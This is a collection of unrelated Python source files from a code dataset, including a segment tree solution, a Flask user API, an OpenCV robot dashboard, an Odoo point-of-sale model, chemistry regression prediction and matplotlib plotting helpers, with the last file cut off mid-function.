ir)\n","sub_path":"salario_e_aliquotas.py","file_name":"salario_e_aliquotas.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"620420473","text":"\"\"\"\nGiven an integer array nums, find the sum of the elements between indices i and j (i ≤ j), inclusive.\n\nThe update(i, val) function modifies nums by updating the element at index i to val.\nExample:\nGiven nums = [1, 3, 5]\n\nsumRange(0, 2) -> 9\nupdate(1, 2)\nsumRange(0, 2) -> 8\nNote:\nThe array is only modifiable by the update function.\nYou may assume the number of calls to update and sumRange function is distributed evenly.\n\n\"\"\"\n\n#https://leetcode.com/articles/range-sum-query-mutable/\nclass NumArray(object):\n def __init__(self, nums):\n \"\"\"\n initialize your data structure here.\n :type nums: List[int]\n \"\"\"\n self.n = len(nums)\n self.tree = [0]* 
(2*self.n)\n \n # build tree: leaves hold nums, internal node i sums its children 2i and 2i+1\n for i, j in zip(range(self.n, 2*self.n), range(self.n)):\n self.tree[i] = nums[j]\n \n for i in range(self.n-1, 0, -1):\n self.tree[i] = self.tree[2*i] + self.tree[2*i + 1]\n \n\n def update(self, i, val):\n \"\"\"\n :type i: int\n :type val: int\n :rtype: None\n \"\"\"\n pos = self.n + i\n self.tree[pos] = val\n while pos > 0:\n left = pos\n right = pos\n if pos % 2 == 0: # pos is a left child, sibling is on the right\n right = pos + 1\n else:\n left = pos - 1\n self.tree[pos // 2] = self.tree[left] + self.tree[right]\n pos //= 2\n \n\n def sumRange(self, i, j):\n \"\"\"\n sum of elements nums[i..j], inclusive.\n :type i: int\n :type j: int\n :rtype: int\n \"\"\"\n l = i + self.n\n r = j + self.n\n \n total = 0\n while l <= r:\n if l % 2 == 1: # l is a right child: count it, step past it\n total += self.tree[l]\n l = l + 1\n if r % 2 == 0: # r is a left child: count it, step past it\n total += self.tree[r]\n r = r - 1\n l //= 2\n r //= 2\n return total\n \n# Your NumArray object will be instantiated and called as such:\n# numArray = NumArray(nums)\n# numArray.sumRange(0, 1)\n# numArray.update(1, 10)\n# numArray.sumRange(1, 2)\n","sub_path":"307. Range Sum Query - Mutable.py","file_name":"307. Range Sum Query - Mutable.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114633098","text":"import datetime\n\nstd_map = {\n\t'KE' : 'Kenya',\n\t'UG' : 'Uganda',\n\t'TZ' : 'Tanzania'\n}\n\npresent = {} # empty dictionary will hold students who attended class on a particular day.\n\n\nclass Student(object):\n\t'''\n\tClass to create students who attended a class on a given day.\n\t'''\n\tstd_id = 0 # Initializes the student id to enable allocation of progressive IDs to consecutive students.\n\tnew_date = datetime.date.today()\n\n\tdef __init__(self, fname = '', lname = '', country = std_map['KE'] ,\\\n\t date = datetime.date.today()):\n\t\tStudent.std_id += 1 # Increment the value of ID each time a student obj is created\n\t\tself.id = Student.std_id\n\t\tself.fname = fname\n\t\tself.lname = lname\n\t\tself.country = country\n\t\tself.date = date\n\n\tdef set_present(self, **kwargs):\n\t\tself.data = { # default student data\n\t\t\t'location' : 'Hogwarts',\n\t\t\t'teacher' : 'Alex',\n\t\t}\n\t\tself.data.update(kwargs)\n\t\tpresent[self.fname + \" \" + self.lname] = self.date\n","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"586273908","text":"import argparse\nimport itertools\nimport json\nimport os\n\nimport chainer\nimport numpy as np\nimport nibabel as nib\nimport pandas as pd\n\nfrom load import load_nifti\nfrom model import VoxResNet\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"segment with VoxResNet\")\n parser.add_argument(\n \"--input_file\", \"-i\", type=str,\n help=\"input json file of test dataset\")\n parser.add_argument(\n \"--output_suffix\", \"-o\", type=str, default=\"_segTRI_predict.nii.gz\",\n help=\"result of the segmentation, default=_segTRI_predict.nii.gz\")\n parser.add_argument(\n \"--model\", \"-m\", type=str,\n help=\"a file containing parameters of trained VoxResNet\")\n parser.add_argument(\n \"--shape\", type=int, nargs=\"*\", action=\"store\",\n default=[80, 80, 80],\n help=\"input patch shape of VoxResNet, default=[80, 80, 80]\")\n parser.add_argument(\n \"--gpu\", \"-g\", default=-1, type=int,\n help=\"negative value indicates no gpu, default=-1\")\n args = parser.parse_args()\n
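# Editor's note: a small usage check of the NumArray segment tree from the
# "307. Range Sum Query - Mutable" record above, mirroring its docstring
# example; it assumes the Python 3 fixes applied there and that NumArray is
# in scope (hypothetical placement, this corpus is not meant to execute).
nums = [1, 3, 5]
arr = NumArray(nums)
assert arr.sumRange(0, 2) == 9   # 1 + 3 + 5
arr.update(1, 2)                 # nums is now effectively [1, 2, 5]
assert arr.sumRange(0, 2) == 8   # 1 + 2 + 5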
print(args)\n\n with open(args.input_file) as f:\n dataset = json.load(f)\n test_df = pd.DataFrame(dataset[\"data\"])\n\n vrn = VoxResNet(dataset[\"in_channels\"], dataset[\"n_classes\"])\n chainer.serializers.load_npz(args.model, vrn)\n\n if args.gpu >= 0:\n chainer.cuda.get_device(args.gpu).use()\n vrn.to_gpu()\n xp = chainer.cuda.cupy\n else:\n xp = np\n\n for image_path, subject in zip(test_df[\"image\"], test_df[\"subject\"]):\n image, affine = load_nifti(image_path, with_affine=True)\n image = image.transpose(3, 0, 1, 2)\n slices = [[], [], []]\n for img_len, patch_len, slices_ in zip(image.shape[1:], args.shape, slices):\n assert img_len > patch_len, (img_len, patch_len)\n stride = int((img_len - patch_len) / int(img_len / patch_len))\n for i in range(int(img_len / patch_len)):\n slices_.append(slice(i * stride, i * stride + patch_len))\n slices_.append(slice(img_len - patch_len, img_len))\n output = np.zeros((dataset[\"n_classes\"],) + image.shape[1:])\n for xslice, yslice, zslice in itertools.product(*slices):\n patch = image[slice(None), xslice, yslice, zslice]\n patch = np.expand_dims(patch, 0)\n x = xp.asarray(patch)\n output[slice(None), xslice, yslice, zslice] += chainer.cuda.to_cpu(\n vrn(x).data[0])\n y = np.argmax(output, axis=0)\n nib.save(\n nib.Nifti1Image(np.int32(y), affine),\n os.path.join(\n os.path.dirname(image_path),\n subject + args.output_suffix))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"150392065","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, tools, _\nfrom datetime import datetime\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass PosOrder(models.Model):\n _inherit = 'pos.order'\n\n dosificacion_actual = fields.Many2one('dosificacion.boliviana', string='Dosificación Actual', readonly=True)\n monto_pagado = fields.Float(string='Pago de venta', digits=0)\n\n @api.model\n def _order_fields(self, ui_order):\n result = super(PosOrder, self)._order_fields(ui_order)\n result['dosificacion_actual'] = self.env['pos.session'].browse(ui_order['pos_session_id']).dosificacion_actual.id\n result['monto_pagado'] = ui_order['amount_paid']\n return result\n\n def _prepare_invoice(self):\n result = super(PosOrder, self)._prepare_invoice()\n result['dosificacion_actual'] = self.session_id.dosificacion_actual.id\n result['nit_factura'] = self.partner_id.ci_nit\n result['razon_social_factura'] = self.partner_id.razon_social\n result['date_invoice'] = datetime.today()\n result['tipo_factura'] = 'Computarizada'\n return result\n\n @api.depends('statement_ids', 'lines.price_subtotal_incl', 'lines.discount')\n def _compute_amount_all(self):\n for order in self:\n order.amount_paid = order.amount_return = order.amount_tax = 0.0\n currency = order.pricelist_id.currency_id\n order.amount_paid = sum(payment.amount for payment in order.statement_ids)\n order.amount_return = sum(payment.amount < 0 and payment.amount or 0 for payment in order.statement_ids)\n order.amount_tax = currency.round(sum(self._amount_line_tax(line, order.fiscal_position_id) for line in order.lines))\n amount_total_incluid_tax = currency.round(sum(line.price_subtotal_incl for line in order.lines))\n order.amount_total = amount_total_incluid_tax\n\nclass PosOrderLine(models.Model):\n _inherit = 'pos.order.line'\n\n tipo_pedido = fields.Char(string='Tipo Pedido', help='Detalle de los 
pedidos si son para llevar o para la mesa')","sub_path":"acoim_pos_facturacion/models/pos_order.py","file_name":"pos_order.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"30212873","text":"import cv2\nimport numpy as np\n\n\nclass Visualizer():\n sound_level_list:list = []\n for x in range(0, 150):\n sound_level_list.append(0)\n height: int = 480\n width: int = 640\n url: str = None\n capture = None\n gas_level_threshold: int = .6\n\n def __init__(self, url):\n self.capture = cv2.VideoCapture(0)\n # self.capture = cv2.VideoCapture(self.url)\n\n def get_frame(self, forward_amount: int, turning_amount: int,\n microphone_level: float, gas_level: float, light_on: bool,\n wifi_network: str, motion_detected: bool):\n green_light = cv2.imread(\"D:\\Sohom\\Programming_Data\\Synopsys2020\\OnGroundRobot\\green_light.png\")\n green_light = cv2.resize(green_light, (30, 40), interpolation=cv2.INTER_AREA)\n\n ret, frame = self.capture.read()\n if not ret: return None\n\n frame = cv2.resize(frame, (self.width, self.height), interpolation=cv2.INTER_AREA)\n\n # draw forward backward arrow\n start_point = (60, 350)\n end_point = (90, int(350 - forward_amount * 60))\n color = (255, 255, 0)\n thickness = -1\n\n if (forward_amount != 0):\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n\n pts = np.array([[75 - 40, 350 - forward_amount * 60], [75 + 40, 350 - forward_amount * 60],\n [75, 350 - forward_amount * 120]], np.int32)\n pts = pts.reshape((-1, 1, 2))\n frame = cv2.fillPoly(frame, [pts], (255, 255, 0))\n\n # draw forward backward arrow\n start_point = (475, 360)\n end_point = (int(475-turning_amount*60), 390)\n color = (255, 255, 0)\n thickness = -1\n if (turning_amount != 0):\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n pts = np.array([[475 - turning_amount * 60, 375 - 40], [474 - turning_amount * 60, 375 + 40,],\n [475 - turning_amount * 120, 375]], np.int32)\n pts = pts.reshape((-1, 1, 2))\n frame = cv2.fillPoly(frame, [pts], (255, 255, 0))\n\n #write text for wifi network\n frame = cv2.putText(frame, wifi_network, (460, 30), cv2.FONT_HERSHEY_DUPLEX, .8,\n (0, 0, 255), 1)\n\n # add graphic for light\n if light_on:\n x_offset = 425\n y_offset = 0\n frame[y_offset:y_offset + green_light.shape[0], x_offset:x_offset + green_light.shape[1]] = green_light\n\n # add graphic for gas reading\n start_point = (570, 300)\n end_point = (590, int(300 - gas_level*100))\n if (gas_level>self.gas_level_threshold):\n color = (0, 0, 255)\n else:\n color = (0, 255, 0)\n thickness = -1\n\n\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n\n pts = np.array([[550, 300 - self.gas_level_threshold*100-10], [550, 300 - self.gas_level_threshold*100+10],\n [570, 300-self.gas_level_threshold*100]], np.int32)\n pts = pts.reshape((-1, 1, 2))\n frame = cv2.fillPoly(frame, [pts], (255, 255, 0))\n\n #add graphic for motion detected\n if (motion_detected):\n text: str = \"Motion Detected\"\n else :\n text: str = \"No Motion\"\n\n frame = cv2.putText(frame, text, (50, 30), cv2.FONT_HERSHEY_DUPLEX, .8,\n (0, 0, 255), 1)\n\n #display for sound level over time\n if (len(self.sound_level_list)>150):\n del self.sound_level_list[0]\n self.sound_level_list.append(microphone_level)\n\n start_point = (24, 40)\n end_point = (30, 150)\n color = (255, 255, 0)\n thickness = -1\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n\n start_point = (25, 
150)\n end_point = (185, 155)\n color = (255, 255, 0)\n thickness = -1\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n\n count:int = 0\n for x in self.sound_level_list:\n frame[int(145-x*100):int(145-x*100)+5, 30+count:30+count+5] = (0, int(255-x*255), int(x*255))\n count+=1\n\n frame = cv2.putText(frame, \"Sound Level\", (30, 180), cv2.FONT_HERSHEY_DUPLEX, .8,\n (255, 255, 0), 1)\n\n #scale up screen\n scale: float = 1.2\n frame = cv2.resize(frame, (int(640*scale), int(480*scale)), interpolation=cv2.INTER_AREA)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n return None\n return frame\n\n def release_visualizer(self):\n self.capture.release()\n cv2.destroyAllWindows()\n\n\ndef main():\n vis = Visualizer(\"\")\n count: float = 0;\n direction: int = 1\n while True:\n frame = vis.get_frame(count, count, 0, 0, True, \"Home Wifi\", True, 0)\n if frame is None:\n break\n cv2.imshow(\"camera stream\", frame)\n\n if count > 1:\n direction = -1\n if count < -1:\n direction = 1\n\n count += .05 * direction\n\n vis.release_visualizer()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"OnGroundRobot/Visualizer.py","file_name":"Visualizer.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392549649","text":"# -*- coding: utf-8 -*-\n# coding: utf-8\n# @Author : WeiXin\n# 忽略版本警告\nimport warnings\n\nwarnings.filterwarnings('ignore')\nfrom jpype import *\nimport jpype.imports\nfrom jpype.types import *\nimport os.path\nimport numpy as np\n\n\n\nimport joblib\nfrom rdkitfingerprint import *\nfrom cdkfingerprint import *\nimport pickle\ncurrent_path = os.path.dirname(__file__)\n#print(current_path)\n\n\ndef SelectAlgorithm(algorithmtype):\n job = joblib.load( current_path + '/RandomForest_Regression_Morgan.pkl')\n if algorithmtype ==0:\n job = joblib.load(current_path + '/RandomForest_Regression_Morgan.pkl')\n elif algorithmtype ==1:\n job = joblib.load(current_path + '/SVM_Regression_Hybridization.pkl')\n elif algorithmtype == 2:\n job = joblib.load(current_path + '/gbdt.joblib')\n return job\n\ndef RegressionPredit(smiles, al):\n fingerprint = GetRdkitMorganFingerprint(smiles).reshape(1, 2048)\n if al == 1:\n fingerprint = GetCDKHybridizationFingerprint(smiles).reshape(1, 1024)\n elif al == 0:\n fingerprint = GetRdkitMorganFingerprint(smiles).reshape(1, 2048)\n elif al == 2:\n fingerprint = GetRdkitDaylightFingerprint(smiles).reshape(1, 1024)\n #fingerprint = GetRdkitMorganFingerprint(smiles).reshape(1, 2048)\n #print(fingerprint.shape)\n model = SelectAlgorithm(al)\n PCE = model.predict(fingerprint)\n #print(str(PCE[0]))\n return str(PCE[0])\n #prob = model.predict_proba(fingerprint)\n #target = model.predict(fingerprint)\n #return prob, target\n\n\nif __name__ == '__main__':\n smiles = 'O=C1C(C2=C(O)C=C(N(C(C)CC)CCC)C=C2O)=C([O-])/C1=C(C(O)=C/3)\\C(O)=CC3=[N+](CCC)\\C(C)CC'\n startJVM(getDefaultJVMPath(), \"-ea\")\n print(RegressionPredit(smiles, 0))\n #ClassifierPredit(smiles, 1)\n #prob = Regrepredit(smiles, 1)\n #print(type(str(prob[0][0])))\n #print(target)\n #predit(smiles,1)","sub_path":"predict/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"460484946","text":"# -*- coding:utf-8 -*-\n\nimport os\nimport sys\nimport codecs\nfrom utils import DataLoader\nimport time\nimport pickle\ndef load(qfile,d_dir,ofile,k):\n loader = 
DataLoader(ofile, qfile, d_dir)\n if loader.save(ofile):\n print('saved')\n #data = loader.loader(ofile)\n #print(type(data))\n else:\n print('fail')\n print('top_'+str(k)+' Done')\n\nif __name__ == '__main__':\n top_n = [10,50,100,150,200]\n qfile = './source/query_seg/query_low.txt'\n d_dir = './source/low_seg/top'\n o_file = './data/low/top'\n for k in top_n:\n load(qfile,d_dir+str(k),o_file+str(k)+'.pkl',k)\n #time.sleep(300)\n #with codecs.open(o_file+str(10)+'.pkl','rb') as fo:\n # data = pickle.load(fo)\n # print(type(data))\n #time.sleep(300) \n print('low_ done')\n \n qfile = './source/query_seg/query_med.txt'\n d_dir = './source/med_seg/top'\n o_file = './data/med/top'\n for k in top_n:\n load(qfile,d_dir+str(k),o_file+str(k)+'.pkl',k)\n print('med_ done')\n\n qfile = './source/query_seg/query_high.txt'\n d_dir = './source/high_seg/top'\n o_file = './data/high/top'\n for k in top_n:\n load(qfile,d_dir+str(k),o_file+str(k)+'.pkl',k)\n print('high_ done')\n\n \n","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"82259822","text":"\"\"\"\nSetting the values of format() arguments\n\"\"\"\n# 1. Assign values directly in the format() call\nstr01 = \"学校:{name},网址:{url}\".format(name=\"达内\", url=\"tts.tmooc,cn\")\nprint(str01)\n# 2. Fill the {} placeholders by passing multi-value arguments to format()\n# Use ** to pass a dictionary\ndict01 = {\"name\": \"达内\", \"url\": \"tts.tmooc,cn\"}\nstr02 = \"学校:{name},网址:{url}\".format(**dict01)\nprint(str02)\n# Pass a list\nlist01 = [\"达内\", \"tts.tmooc,cn\"]\nstr03 = \"学校:{0[0]}, 网址:{0[1]}\".format(list01)\nprint(str03)\n# Pass multiple lists\nlist02 = [\"百度\", \"tts.tmooc,cn\"]\nlist03 = [\"达内\", \"http:www.baidu.com\"]\nstr04 = \"学校:{1[0]}, 网址:{0[1]}\".format(list02, list03)\nprint(str04)\n# Pass objects\nclass Cat:\n def __init__(self, name):\n self.name = name\nclass Mouse:\n def __init__(self, name):\n self.name = name\ntom = Cat(\"Tom\")\njerry = Mouse(\"Jerry\")\nstr05 = \"{0.name} wants to eat {1.name}\".format(tom, jerry)\nprint(str05)\n","sub_path":"test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488136025","text":"import typing as t\nimport typing_extensions as tx\nimport time\nimport pathlib\nimport subprocess\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass ConnectionChecker(tx.Protocol):\n def ping(self) -> bool:\n \"\"\"is connected?\"\"\"\n ...\n\n def pong(self) -> bool:\n \"\"\"reply\"\"\"\n ...\n\n\nclass SentinelHandler(tx.Protocol):\n def create_sentinel(self) -> str:\n ...\n\n def inject_sentinel(self, argv: t.List[str], *, sentinel: str) -> t.List[str]:\n ...\n\n def create_connection_checker(self, *, sentinel: str) -> ConnectionChecker:\n ...\n\n\nclass FileSentinelHandler: # SentinelHandler\n def __init__(self, option_name: str = \"--sentinel\") -> None:\n self.option_name = option_name\n\n def inject_sentinel(self, argv: t.List[str], *, sentinel: str) -> t.List[str]:\n if sentinel in argv:\n logger.debug(\"sentinel %s is included in %s\", sentinel, argv)\n return argv\n return [*argv, self.option_name, sentinel]\n\n def create_sentinel(self) -> str:\n import tempfile\n\n fd, sentinel = tempfile.mkstemp()\n logger.info(\"create sentinel %s\", sentinel)\n return sentinel\n\n def create_connection_checker(self, *, sentinel: str) -> ConnectionChecker:\n return FileConnectionChecker(sentinel=sentinel)\n\n\nclass FileConnectionChecker: # ConnectionChecker\n def __init__(self, *,
sentinel: str):\n self.sentinel = sentinel\n\n def ping(self) -> bool:\n return not pathlib.Path(self.sentinel).exists()\n\n def pong(self) -> bool:\n sentinel = self.sentinel\n if pathlib.Path(sentinel).exists():\n logger.info(\"remove sentinel %s\", sentinel)\n pathlib.Path(sentinel).unlink()\n return True\n return False\n\n\ndef spawn_with_connection(\n argv: t.List[str],\n *,\n handler: t.Optional[SentinelHandler] = None,\n sentinel: t.Optional[str] = None,\n sentinel_option: str = \"--sentinel\",\n retries: t.List[float] = [0.1, 0.2, 0.2, 0.4, 0.8, 1.6, 3.2, 6.4],\n check: bool = True,\n) -> t.Tuple[subprocess.Popen, ConnectionChecker]:\n handler = handler or FileSentinelHandler(sentinel_option)\n sentinel = sentinel or handler.create_sentinel()\n argv = handler.inject_sentinel(argv, sentinel=sentinel)\n\n logger.info(\"spawn process %r\", \" \".join(argv))\n p = subprocess.Popen(argv)\n\n checker = handler.create_connection_checker(sentinel=sentinel)\n\n if not check:\n return p, checker\n\n try:\n start_time = time.time()\n end_time = None\n\n for wait_time in retries:\n if checker.ping():\n end_time = time.time()\n logger.debug(\"connected\")\n break\n\n logger.debug(\"wait: %f\", wait_time)\n time.sleep(wait_time) # todo: backoff\n\n if end_time is None:\n raise TimeoutError(f\"{time.time() - start_time} sec passed, {p.args}\")\n return p, checker\n except Exception as exc:\n logger.warning(\"hmm %r, kill process\", exc)\n p.kill() # kill?\n raise\n","sub_path":"daily/20200606/example_egoist/01directives/spawn.py","file_name":"spawn.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"27558436","text":"from flask import Flask, jsonify, request, send_file, send_from_directory\nimport logging\n\nfrom db import Db\nfrom user_dao import UserDao\n\napp = Flask(\"user_api\")\n# logging.basicConfig(level=logging.DEBUG)\n\n\n@app.route('/')\ndef get_index():\n \"\"\"\n Root Flask route to serve index.html\n\n Parameters: None\n\n Returns:\n Response: A Flask Response object containing index.html\n \"\"\"\n\n logging.info(\"Serving file index.html\")\n return send_file('index.html')\n\n\n@app.route(\"/images/\")\ndef get_image(filename):\n \"\"\"\n Flask route to serve the files located in the image directory\n\n Parameters:\n filename (str): The name of the file to access.\n\n Returns:\n Response: A Flask Response object containing the requested file\n \"\"\"\n\n logging.info(f\"Serving file images/{filename}\")\n return send_from_directory(\"images\", filename)\n\n\n@app.route('/user')\ndef get_user():\n \"\"\"\n Flask route that reads a DataTable request string and returns records in JSON format\n\n Parameters: None\n\n Returns:\n Response: A Flask Response object containing requested users encoded in the DataTable expected JSON format\n \"\"\"\n\n error_list = []\n user_dao = UserDao()\n\n # Get the parameters from the request URL\n draw = request.args.get('draw', default=1, type=int)\n start = request.args.get('start', default=0, type=int)\n length = request.args.get('length', default=25, type=int)\n sort_index = request.args.get('order[0][column]', default=0, type=str)\n sort_by = request.args.get('columns[' + sort_index + '][name]', type=str).lower()\n\n # Verify the order string\n if sort_by not in user_dao.columns:\n error_list.append(f\"Unable to sort on column {sort_by} as it was not found\")\n sort_by = user_dao.columns[0]\n\n # Sort in descending order when requested\n desc_flag = 
False\n if request.args.get('order[0][dir]', type=str) == \"desc\":\n desc_flag = True\n\n # Return the requested data in json format\n logging.info(f\"Serving user data (start={start}, length={length}, sort_by={sort_by})\")\n db = Db()\n count = user_dao.get_count(db)\n\n payload = {\n \"draw\": draw,\n \"recordsTotal\": count,\n \"recordsFiltered\": count\n }\n\n if len(error_list) == 0:\n payload[\"data\"] = user_dao.read(db, start, length, sort_by, desc_flag)\n else:\n payload[\"error\"] = '; '.join(error_list)\n\n return jsonify(payload)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"123889382","text":"import numpy as np\n'''\n%COMPUTECOST Compute cost for linear regression\n% J = COMPUTECOST(X, y, theta) computes the cost of using theta as the\n% parameter for linear regression to fit the data points in X and y\n\n% Initialize some useful values\nm = length(y); % number of training examples\n\n% You need to return the following variables correctly\n'''\n\n\ndef computeCost(X, y, theta):\n # Initialize some useful values\n m = len(y) # number of training examples\n\n h_theta = np.dot(X, theta)\n err = h_theta - y\n J = (err**2).sum() / (2 * m)\n\n return J\n","sub_path":"hw_python/machine-learning-ex1/univariate linear regression/computeCost.py","file_name":"computeCost.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"397602167","text":"import os\nimport pytest\n\nimport testinfra.utils.ansible_runner\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']\n).get_hosts('all')\n\n\n@pytest.mark.parametrize('name,version', [\n ('policycoreutils-python', '2.5'),\n ('openssh-server', '7.4'),\n])\ndef test_packages(host, name, version):\n pkg = host.package(name)\n assert pkg.is_installed\n assert pkg.version.startswith(version)\n\n\ndef test_sshd_service_enabled_started(host):\n service = host.service('sshd')\n assert service.is_running\n assert service.is_enabled\n\n\n@pytest.mark.parametrize('name', [\n 'gitlab_gitlab-ce',\n 'gitlab_gitlab-ce-source',\n])\ndef test_gitlab_yum_repository(host, name):\n file = host.file('/etc/yum.repos.d/{0}.repo'.format(name))\n assert file.exists\n assert file.user == 'root'\n assert file.group == 'root'\n assert file.mode == 0o644\n assert file.contains('[{0}]'.format(name))\n","sub_path":"molecule/default/tests/test_default.py","file_name":"test_default.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"443627435","text":"import csv\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\n\nplt.style.use('ggplot')\nmpl.rcParams['text.color'] = 'black'\nmpl.rc('grid', linewidth=0.5, alpha=0.8, linestyle='-', color='#D3D3D3')\nmpl.rc('axes', facecolor='white')\nmpl.rc('boxplot', meanline=True, showmeans=True)\nmpl.rc('boxplot.meanprops', linestyle='-', linewidth=1.0)\nmpl.rc('boxplot.medianprops', linestyle='-', linewidth=1.0)\n\n\nclass Viz:\n @staticmethod\n def _save(fstr, **kwargs):\n plt.savefig(fstr, **kwargs)\n plt.close()\n\n @staticmethod\n def _format_legend(ax=None):\n if not ax:\n ax = plt.gca()\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax.legend(loc='center 
left', bbox_to_anchor=(1, 0.5))\n\n @staticmethod\n def _format_axes_label(ax=None, xlabel=None, ylabel=None):\n if not ax:\n ax = plt.gca()\n ax.set_xlabel(xlabel if xlabel else '')\n ax.set_ylabel(ylabel if ylabel else '')\n\n @staticmethod\n def _format_axes_ticks(xticks=None, yticks=None, xlabels=None, ylabels=None, x_rotation=0, y_rotation=0):\n plt.xticks(xticks, xlabels, rotation=x_rotation)\n plt.yticks(yticks, ylabels, rotation=y_rotation)\n\n @staticmethod\n def _format(ax=None, title=None, legend=None,\n xlabel=None, xticks=None, xlabels=None, xpad=None, xlim=None, x_rotation=0,\n ylabel=None, yticks=None, ylabels=None, ypad=None, ylim=None, y_rotation=0):\n\n if not ax:\n ax = plt.gca()\n\n if xticks is None:\n xticks = ax.get_xticks()\n if yticks is None:\n yticks = ax.get_yticks()\n\n if xlabels is None:\n xlabels = xticks\n if ylabels is None:\n ylabels = yticks\n\n if xlim:\n ax.set_xlim(xlim)\n if ylim:\n ax.set_ylim(ylim)\n\n if xpad:\n ax.tick_params(axis='x', which='major', pad=xpad)\n if ypad:\n ax.tick_params(axis='y', which='major', pad=ypad)\n\n if legend:\n Viz._format_legend(ax)\n\n Viz._format_axes_label(ax, xlabel, ylabel)\n Viz._format_axes_ticks(xticks, yticks, xlabels, ylabels, x_rotation, y_rotation)\n plt.title(title if title else '')\n\n @staticmethod\n def line(results, fstr, columns=None, index=None, **kwargs):\n df = pd.DataFrame(results, columns=columns, index=index)\n df.plot()\n Viz._format(**kwargs)\n Viz._save(fstr, bbox_inches='tight')\n\n @staticmethod\n def box(results, fstr, columns=None, index=None, **kwargs):\n df = pd.DataFrame(results, columns=columns, index=index)\n df.plot.box()\n Viz._format(**kwargs)\n Viz._save(fstr, bbox_inches='tight')\n\n @staticmethod\n def bar(results, fstr, columns=None, index=None, stacked=False, legend=True, xerr=None, yerr=None,\n colormap=None, color=None, horizontal=False, **kwargs):\n kwds = {}\n if colormap and color:\n kwds['color'] = color\n elif colormap:\n kwds['colormap'] = colormap\n elif color:\n kwds['color'] = color\n\n df = pd.DataFrame(results, columns=columns, index=index)\n if horizontal:\n df.plot.barh(stacked=stacked, legend=legend, xerr=xerr, yerr=yerr, **kwds)\n else:\n df.plot.bar(stacked=stacked, legend=legend, xerr=xerr, yerr=yerr, **kwds)\n Viz._format(legend=legend, **kwargs)\n Viz._save(fstr, bbox_inches='tight')\n\n @staticmethod\n def hist(results, fstr, columns=None, index=None, **kwargs):\n df = pd.DataFrame(results, columns=columns, index=index)\n df.plot.hist(colormap='Paired')\n Viz._format(**kwargs)\n Viz._save(fstr, bbox_inches='tight')\n\n @staticmethod\n def table(header, data, fstr):\n with open('{}.csv'.format(fstr), 'w') as f:\n writer = csv.writer(f)\n writer.writerow(header)\n writer.writerows(data)\n\n @staticmethod\n def error_bar(x, y, fstr, xerr=None, yerr=None, ecolor='r', marker='^', **kwargs):\n plt.errorbar(x, y, xerr=xerr, yerr=yerr, marker=marker, ecolor=ecolor)\n Viz._format(**kwargs)\n Viz._save(fstr, bbox_inches='tight')\n\n\nclass Visualize(Viz):\n def plot_intervals(self, actuals, predicted, data, rstr, **kwargs):\n x = np.arange(0, actuals.size)\n\n for n, ((low, high), c, nc) in enumerate(reversed(data)):\n yerr = actuals - low, high - actuals\n plt.errorbar(x, actuals, yerr=yerr, ecolor=c, color=c, linestyle='None', zorder=n, capthick=2,\n label='NC {}'.format(nc))\n\n for i, a in enumerate(actuals):\n plotted = False\n for (low, high), c, _ in data:\n if low[i] <= a <= high[i]:\n plotted = True\n plt.plot([i], [a], marker='o', color=c)\n 
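# Editor's note: plot_intervals (continuing below) marks a point as covered
# as soon as any (low, high) band contains it. A standalone NumPy sketch of
# that coverage test; the names coverage and bands are hypothetical and not
# part of the Viz helpers:
import numpy as np

def coverage(actuals, bands):
    # bands: one (low, high) array pair per confidence level
    hits = np.zeros(len(actuals), dtype=bool)
    for low, high in bands:
        hits |= (low <= actuals) & (actuals <= high)
    return hits.mean()

actuals = np.array([1.0, 2.0, 3.0])
bands = [(np.array([0.5, 2.5, 2.5]), np.array([1.5, 3.5, 3.5]))]
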